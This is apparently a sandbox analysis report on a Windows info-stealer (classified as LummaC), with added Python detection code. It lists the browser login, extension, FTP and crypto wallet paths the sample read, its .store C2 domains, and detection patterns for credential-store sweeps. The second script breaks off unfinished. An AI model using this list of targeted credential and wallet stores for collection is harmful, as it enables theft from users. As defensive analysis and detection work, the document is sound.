Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents (8 times)
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\AQRFEVRTGL (6 times)
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT (2 times)
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA (3 times)
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH (3 times)
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC (1 time)
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ZGGKNSUKOP (4 times)
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY (3 times)
Source: Yara match | File source: 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2123719627.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2075895633.0000000001197000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2123446678.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2120936857.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2089453948.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2090525547.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2120905193.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2077335207.0000000001199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5800, type: MEMORYSTR
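The file-access entries above are the stealer's collection sweep: one process, C:\Users\user\Desktop\file.exe, opens Chrome's Login Data and extension settings, Firefox's logins.json, key4.db and places.sqlite, FTP-client profiles and desktop wallet directories within a few seconds. The Python below turns that pattern into a detection rule. It is an added example and is not part of the Joe Sandbox report: the event lines and their pipe-separated format are constructed telemetry modelled on the report's entries, the glob patterns are derived from the paths listed above, and the expected-owner mapping (only chrome.exe should read Chrome stores, only firefox.exe Firefox stores) is an assumption. A process is flagged when it reaches into two or more store categories, or opens a browser store while not being that browser.

```python
"""Detect one process sweeping credential stores, the pattern in the
'File opened' entries above.  Added example, not part of the report.
Event lines are constructed: "<timestamp> | <process image> | <path opened>"."""
import fnmatch
from collections import defaultdict
from typing import Optional

# Glob patterns derived from the paths in the report, lower-cased and
# generalised to any user profile.  First matching pattern wins.
SENSITIVE_STORES = [
    ("chrome_logins",   r"*\appdata\local\google\chrome\user data\*\login data*"),
    ("chrome_ext",      r"*\appdata\local\google\chrome\user data\*\*extension settings\*"),
    ("firefox_logins",  r"*\appdata\roaming\mozilla\firefox\profiles\*\logins.json"),
    ("firefox_keydb",   r"*\appdata\roaming\mozilla\firefox\profiles\*\key4.db"),
    ("firefox_history", r"*\appdata\roaming\mozilla\firefox\profiles\*\places.sqlite"),
    ("ftp_clients",     r"*\appdata\roaming\ftpbox*"),
    ("ftp_clients",     r"*\appdata\roaming\smartftp\*"),
    ("ftp_clients",     r"*\appdata\roaming\ftpgetter*"),
    ("ftp_clients",     r"*\appdata\roaming\ftpinfo*"),
    ("ftp_clients",     r"*\appdata\roaming\ftprush*"),
    ("ftp_clients",     r"*\programdata\sitedesigner\3d-ftp*"),
    ("notes_app",       r"*\appdata\roaming\conceptworld\notezilla*"),
    ("wallets",         r"*\appdata\roaming\exodus\exodus.wallet*"),
    ("wallets",         r"*\appdata\roaming\ledger live*"),
    ("wallets",         r"*\appdata\roaming\atomic\local storage\leveldb*"),
    ("wallets",         r"*\appdata\local\coinomi\coinomi\wallets*"),
    ("wallets",         r"*\appdata\roaming\bitcoin\wallets*"),
    ("wallets",         r"*\appdata\roaming\binance*"),
    ("wallets",         r"*\appdata\roaming\com.liberty.jaxx\indexeddb*"),
    ("wallets",         r"*\appdata\roaming\electrum\wallets*"),
    ("wallets",         r"*\appdata\roaming\electrum-ltc\wallets*"),
    ("wallets",         r"*\appdata\roaming\guarda\indexeddb*"),
]

# Assumption: only the browser itself has business reading its own stores.
EXPECTED_OWNERS = {
    "chrome_logins": {"chrome.exe"},
    "chrome_ext": {"chrome.exe"},
    "firefox_logins": {"firefox.exe"},
    "firefox_keydb": {"firefox.exe"},
    "firefox_history": {"firefox.exe"},
}

# Constructed telemetry modelled on the report's entries; not captured data.
SAMPLE_EVENTS = [
    r"2024-10-30 02:27:01 | C:\Users\user\Desktop\file.exe | C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account",
    r"2024-10-30 02:27:01 | C:\Users\user\Desktop\file.exe | C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json",
    r"2024-10-30 02:27:02 | C:\Users\user\Desktop\file.exe | C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
    r"2024-10-30 02:27:02 | C:\Users\user\Desktop\file.exe | C:\Users\user\AppData\Roaming\FTPRush",
    r"2024-10-30 02:27:05 | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"2024-10-30 02:27:06 | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db",
    r"2024-10-30 02:27:07 | C:\Windows\explorer.exe | C:\Users\user\Documents\AQRFEVRTGL",
    r"2024-10-30 02:27:09 | C:\Users\user\AppData\Local\Temp\upd.exe | C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db",
]


def classify(path: str) -> Optional[str]:
    """Return the store category a path belongs to, or None if it is not sensitive."""
    lowered = path.lower()
    for category, pattern in SENSITIVE_STORES:
        if fnmatch.fnmatchcase(lowered, pattern):
            return category
    return None


def image_name(image_path: str) -> str:
    """Lower-cased basename of a Windows image path; works on any host OS."""
    return image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str):
    """Split a constructed event line into (timestamp, image, path)."""
    timestamp, image, path = (field.strip() for field in line.split("|", 2))
    return timestamp, image, path


def find_stealer_candidates(lines, min_categories: int = 2) -> dict:
    """Map each flagged process image to the sorted store categories it touched.

    Flag when a process reaches >= min_categories distinct categories (the
    sweep pattern) or opens a browser store without being that browser.
    """
    touched = defaultdict(set)
    owner_mismatch = set()
    for line in lines:
        _, image, path = parse_event(line)
        category = classify(path)
        if category is None:
            continue
        touched[image].add(category)
        owners = EXPECTED_OWNERS.get(category)
        if owners and image_name(image) not in owners:
            owner_mismatch.add(image)
    return {
        image: sorted(cats)
        for image, cats in touched.items()
        if len(cats) >= min_categories or image in owner_mismatch
    }


if __name__ == "__main__":
    for image, cats in find_stealer_candidates(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(cats)}")
```

On the constructed events the sweep rule flags file.exe (four categories) and the owner rule flags a Temp-resident binary reading key4.db, while chrome.exe and firefox.exe reading their own stores are not reported. The category threshold is the knob to tune: a single wallet directory read by a backup agent is noise, a process touching browser plus wallet plus FTP stores almost never is.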

Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 5800, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques with signature hits, grouped by tactic; the bracketed figures are the hit badges shown beside each technique in the matrix)

Execution: Windows Management Instrumentation [2]; PowerShell [1]
Persistence: DLL Side-Loading [1]
Privilege Escalation: Process Injection [1]; DLL Side-Loading [1]
Defense Evasion: Virtualization/Sandbox Evasion [34]; Process Injection [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [12]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [2]
Discovery: Security Software Discovery [751]; Virtualization/Sandbox Evasion [34]; Process Discovery [2]; File and Directory Discovery [1]; System Information Discovery [223]
Collection: Archive Collected Data [1]; Data from Local System [41]
Command and Control: Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]
No hits in this analysis: Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact

Source | Detection | Scanner | Label
file.exe | 50% | Virustotal |
file.exe | 39% | ReversingLabs | Win32.Trojan.Amadey
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |

The vendor family labels do not agree with this report's LummaC classification (ReversingLabs names Amadey, Avira a generic crypter); the LummaC verdict rests on the Yara matches and the extracted malware configuration rather than on scanner labels.
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner
necklacedmny.store | 21% | Virustotal
presticitpo.store | 11% | Virustotal
fadehairucw.store | 12% | Virustotal
thumbystriw.store | 15% | Virustotal
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.97.3 | true | true | | unknown
presticitpo.store | unknown | unknown | true | | unknown
thumbystriw.store | unknown | unknown | true | | unknown
crisiwarny.store | unknown | unknown | true | | unknown
fadehairucw.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/api | true | | unknown
presticitpo.store | true | | unknown
scriptyprefej.store | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
navygenerayk.store | true | | unknown
founpiuer.store | true | | unknown
thumbystriw.store | true | | unknown
crisiwarny.store | true | | unknown
Memory-dump sources of file.exe referenced in the table below:
[A] file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmp
[B] file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
[C] file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp
[D] file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp
[E] file.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmp
[F] file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | [A] | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | [A] | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | [A] | false | | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | [B] | false | | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | [B] | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | [A] | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | [C] | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | [A] | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | [C] | false | | unknown
https://www.ecosia.org/newtab/ | [A] | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | [D] | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | [A] | false | URL Reputation: safe | unknown
https://necklacedmny.store/apie | [E] | true | | unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | [B] | false | URL Reputation: safe | unknown
https://necklacedmny.store/ | file.exe, 00000000.00000003.2105019285.0000000001199000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000003.2135307074.00000000011B0000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000002.2171310679.0000000001120000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | [B] | false | URL Reputation: safe | unknown
http://x1.c.lencr.org/0 | [C] | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | [C] | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | [A] | false | URL Reputation: safe | unknown
https://necklacedmny.store/apiY | [F] | true | | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | [C] | false | URL Reputation: safe | unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | [B] | false | URL Reputation: safe | unknown
https://necklacedmny.store/apis | [E] | true | | unknown
https://necklacedmny.store/api- | file.exe, 00000000.00000002.2171551202.00000000011BC000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://support.mozilla.org/products/firefoxgro.all | [D] | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | [A] | false | URL Reputation: safe | unknown

The entries rated safe are search-engine, Mozilla and certificate-authority URLs recovered from process memory; the only entries marked malicious are variants of the necklacedmny.store endpoint, and the characters after /api (apie, apiY, apis, api-) are the bytes that happened to follow the string in memory, not distinct paths.
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | necklacedmny.store | European Union | 13335 | CLOUDFLARENET US | true

The address is Cloudflare (AS13335) anycast space fronting the C2 domain, and the related-sample list further down shows unrelated Lokibot and FormBook samples resolving to the same IP, so blocking and hunting should key on the domain names and TLS SNI, not on the IP.
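The domain, URL and IP tables above give the network indicators of this sample: eight .store domains, the /api endpoint on necklacedmny.store, and a Cloudflare address that other tenants share. The Python below, an added example that is not part of the Joe Sandbox report, matches constructed DNS, TLS and HTTP log lines against those indicators. It makes the domain (or TLS SNI) the decision point, reports connections that only touch the shared IP separately for review, and collapses the memory-truncated URL variants (/apie, /apiY, /apis, /api-) to the canonical endpoint. The log format and the sample lines are constructed; the indicator values are those listed in this report.

```python
"""Match network telemetry against the indicators in this report.
Added example, not part of the Joe Sandbox report.  Log lines are
constructed: "<timestamp> <dns|tls|http> <client> <target> <extra>"."""
from urllib.parse import urlsplit

# Domains the report marks malicious (DNS table and URL/config table).
C2_DOMAINS = {
    "necklacedmny.store", "presticitpo.store", "thumbystriw.store",
    "crisiwarny.store", "fadehairucw.store", "scriptyprefej.store",
    "navygenerayk.store", "founpiuer.store",
}

# 188.114.97.3 is AS13335 (Cloudflare) anycast space shared with unrelated
# sites, so reaching it is context for review, never a verdict on its own.
SHARED_INFRA_IPS = {"188.114.97.3"}

# URLs recovered from process memory in the report; the characters after
# /api are bytes adjacent to the string in memory, not distinct endpoints.
MEMORY_URLS = [
    "https://necklacedmny.store/api",
    "https://necklacedmny.store/apie",
    "https://necklacedmny.store/apiY",
    "https://necklacedmny.store/apis",
    "https://necklacedmny.store/api-",
    "https://necklacedmny.store/",
]

# Constructed log lines; not captured traffic.
SAMPLE_LOG = [
    "2024-10-30T01:27:10Z dns 10.0.0.5 necklacedmny.store A",
    "2024-10-30T01:27:11Z tls 10.0.0.5 188.114.97.3 sni=necklacedmny.store",
    "2024-10-30T01:27:12Z http 10.0.0.7 www.ecosia.org /newtab/",
    "2024-10-30T01:27:13Z tls 10.0.0.8 188.114.97.3 sni=www.example.com",
    "2024-10-30T01:27:14Z dns 10.0.0.9 PRESTICITPO.STORE. A",
]


def canonical_c2_url(url: str) -> str:
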